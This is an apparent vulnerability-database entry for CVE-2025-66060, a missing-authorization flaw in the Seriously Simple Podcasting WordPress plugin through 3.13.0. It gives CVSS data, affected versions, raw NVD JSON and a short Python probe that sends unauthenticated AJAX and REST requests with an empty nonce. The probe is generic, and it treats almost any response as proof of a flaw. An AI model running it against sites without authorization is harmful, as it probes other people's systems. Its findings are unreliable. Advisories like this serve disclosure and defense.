Security Vulnerability Report
中文
CVE-2025-66060 CVSS 5.3 MEDIUM

CVE-2025-66060

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:* - VULNERABLE
Seriously Simple Podcasting <= 3.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66060 PoC - Seriously Simple Podcasting Access Control Bypass # Target: WordPress site with Seriously Simple Podcasting <= 3.13.0 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-66060 This PoC attempts to access admin functions without authentication """ # Common endpoints for Seriously Simple Podcasting endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/ssp/v1/" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } for endpoint in endpoints: # Test unauthenticated access to protected functions data = { "action": "ssp_", # Plugin action prefix "nonce": "", } try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: # Check if response indicates successful unauthorized access if "success" in response.text.lower() or response.text: print(f"[+] Potential vulnerability found at: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True except Exception as e: print(f"[-] Error testing {endpoint}: {e}") print("[-] No obvious vulnerability detected") return False if __name__ == "__main__": print("CVE-2025-66060 Vulnerability Checker") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66060", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:46.767", "lastModified": "2026-04-27T18:16:31.800", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.14.0", "matchCriteriaId": "201F9458-7BDE-4E42-85DD-AB15D5B6A90E"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}